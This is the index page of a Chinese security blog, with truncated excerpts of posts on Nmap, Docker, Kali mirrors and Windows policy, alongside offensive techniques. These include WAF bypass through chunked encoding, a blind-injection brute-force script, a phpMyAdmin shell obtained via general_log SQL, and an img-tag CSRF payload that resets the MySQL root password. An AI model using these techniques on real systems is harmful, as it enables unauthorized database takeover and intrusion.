WebShell'S Blog

我们将研究最著名的渗透工具之一 Nmap 一款标志性的跨平台扫描器。它的原意为Network Mapper（网络映射器），具有相当强大的扫描功能，几乎适用于任何渗透场景。不少人甚至认为它就是全球最好的扫描软件。除了常规的网络扫描，Nmap还可根据NSE (Nmap scripting Engine)的脚本进行大量渗透工作，这种脚本是基于Lua编程语言，有点像javascript。正是NSE，使得N...

- 阅读全文 -

像正常使用Python一样，去使用PentestBox里的Python python -m pip install 模块名 -m ： 模块的方式 pip ： （管道），python内置的模块管理工具

- 阅读全文 -

####what is docker Docker是一个开源的引擎，可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署，包括VMs（虚拟机）、bare metal、OpenStack 集群和其他的基础应用平台。 #####Docker通常用于如下场景： web应用的自动化打包和发布；（我后面就会用到这个功能了额...） 自动...

- 阅读全文 -

技巧1 使用注释扰乱分块数据包 一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理，可以把分块组合成完整的HTTP数据包，这时直接使用常规的分块传输方法尝试绕过的话，会被WAF直接识别并阻断。 我们可以在[RFC7230]中查看到有关分块传输的定义规范。 4.1. Chunked Transfer Coding The chunked trans...

- 阅读全文 -

利用脚本python： #!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ ''' import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = ""...

- 阅读全文 -

央广网西安8月19日消息(记者温超陕西台记者拓紫云)据中国之声《新闻纵横》报道，近年来，比特币等虚拟货币以极其快速的资产价格涨幅，成为全球市场关注的焦点，而其安全问题也备受关注。据国外媒体报道称，仅在2018年上半年，“黑客”就窃取了价值7.31亿美元，约合人民币48亿元的加密货币。而在国内，西安警方日前成功破获一起网络“黑客”盗窃虚拟货币案件，涉案金额高达6亿元人民币。破获这起案件历时半年多，破...

- 阅读全文 -

一、更新 #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #中科大 deb http://mirrors.ustc.edu.cn/kali kali-...

- 阅读全文 -

三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 --------------------------------------------------------- set global general_log='on'; --------------------------------------------------------- SET global ge...

- 阅读全文 -

修改root密码： 保存为：webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="d...

- 阅读全文 -

以Windows 2003为例，启动Windows 2003组策略 点“开始”，在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键，此时可以看到一个“不要运行指定的Windows应用程序”选项，双击该选项，在“策略”选项卡中选择“启用”选项，启动Windows 2003禁止运行指定应用程序的功能，单击“不允许的应用程序的列表”中的“显示”按钮，打开列表框，在列表框...

- 阅读全文 -